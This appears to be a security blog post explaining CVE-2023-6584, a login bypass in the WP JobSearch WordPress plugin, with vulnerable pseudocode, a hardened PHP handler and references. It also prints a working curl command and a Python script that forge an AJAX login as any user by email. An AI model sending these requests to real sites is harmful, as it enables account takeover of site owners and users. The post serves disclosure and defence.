A critical vulnerability tracked as CVE-2023-6584 was discovered in the *WP JobSearch* plugin for WordPress (all versions before 2.3.4). This security flaw allows anyone to log in to any user account—including administrators—with nothing but that user’s email address. This post will break down the vulnerability, show you a simple exploitation example, and provide links to original resources for further reading. All content is written in clear, simple language for easy understanding.

What is CVE-2023-6584?

WP JobSearch is a popular plugin used by thousands for managing job listings on WordPress sites. Versions before 2.3.4 failed to validate logins properly, making it possible for hackers to hijack any user account without knowing a password.

Impact:
- Attackers can access any account, steal personal information, deface the site, or take over the entire WordPress install.

How the Exploit Works (Technical Details)

The vulnerability is a classic case of *broken authentication*. In the affected versions, the login handler only checks that a user with the given email address exists and, in some circumstances (notably via the AJAX-based login endpoint), skips password validation entirely.

Original Vulnerability Report:
- WPScan Advisory
- Wordfence Advisory
- NVD Entry on CVE-2023-6584

How Did This Happen?

A function responsible for AJAX authentication did not verify passwords. The typical flow looks like this (in pseudocode):

// Called via an AJAX endpoint (e.g., /wp-admin/admin-ajax.php?action=jobsearch_login)
function jobsearch_ajax_login($email) {
    $user = get_user_by('email', $email);
    if ($user) {
        // MISSING: password validation
        wp_set_current_user($user->ID);
        wp_set_auth_cookie($user->ID);
        return 'Login successful';
    } else {
        return 'User not found';
    }
}

Notice the missing password check? Anyone who knows your email can act as you.
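For comparison, here is what a hardened version of that handler could look like. This is an added example written for this post, not the plugin's actual fix in 2.3.4; the function name, the nonce action `jobsearch_login_nonce`, and the `user_password` field are assumptions, while the WordPress functions called (`check_ajax_referer`, `wp_authenticate`, `wp_set_auth_cookie`, `wp_send_json_*`) are real core APIs.

```php
<?php
// Added example (hypothetical), not the plugin's own code or patch.
// Hardened AJAX login: nonce check + real password verification.
function jobsearch_ajax_login_hardened() {
    // Reject requests that did not originate from the plugin's own login form.
    // Nonce action name 'jobsearch_login_nonce' is an assumption.
    check_ajax_referer('jobsearch_login_nonce', 'security');

    $email    = isset($_POST['user_login'])
        ? sanitize_email(wp_unslash($_POST['user_login'])) : '';
    // Field name 'user_password' is an assumption for this example.
    $password = isset($_POST['user_password'])
        ? (string) wp_unslash($_POST['user_password']) : '';

    if ($email === '' || $password === '') {
        wp_send_json_error('Missing credentials', 400);
    }

    // wp_authenticate() runs the core 'authenticate' filters, which verify the
    // stored password hash; it accepts an e-mail address as the login name.
    $user = wp_authenticate($email, $password);

    if (is_wp_error($user)) {
        // Same generic message whether the account is unknown or the
        // password is wrong, so the endpoint does not leak valid e-mails.
        wp_send_json_error('Invalid credentials', 401);
    }

    // Only now, after a successful password check, establish the session.
    wp_set_current_user($user->ID);
    wp_set_auth_cookie($user->ID, false, is_ssl());
    wp_send_json_success('Login successful');
}

// Register for logged-out visitors (the vulnerable path is reachable unauthenticated).
add_action('wp_ajax_nopriv_jobsearch_login', 'jobsearch_ajax_login_hardened');
```

The key difference from the pseudocode above is that the auth cookie is set only after `wp_authenticate()` returns a `WP_User`, never on the strength of an email lookup alone.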

Example Exploit Code (Using curl)

The bug can be exploited by making a forged AJAX request. Here’s a basic exploit using the command line with curl:

curl -X POST \
     -d "action=jobsearch_login" \
     -d "user_login=admin@example.com" \
     https://victim.com/wp-admin/admin-ajax.php

Here's a short Python snippet to automate the attack:

import requests

url = 'https://victim.com/wp-admin/admin-ajax.php'
data = {
    'action': 'jobsearch_login',
    'user_login': 'admin@example.com'
}

session = requests.Session()
response = session.post(url, data=data)
print(response.text)  # See if login was successful

# Cookies in 'session' now give you admin access.

*Note: This is for educational and defense purposes only! Do not attack any system you do not own.*

Final Thoughts

CVE-2023-6584 is one of the most dangerous WordPress plugin bugs in recent years due to its simplicity and impact. If you’re running a WordPress site, you need to audit your plugins regularly and ensure they’re up to date.

Original References

- WPScan Disclosure
- Wordfence Threat Report
- NVD: CVE-2023-6584

If you found this helpful, share it and help protect the WordPress community!


*This post is for awareness and defense. Always use security knowledge ethically and responsibly.*

Timeline

Published on: 02/27/2024 09:15:37 UTC
Last modified on: 08/01/2024 13:45:47 UTC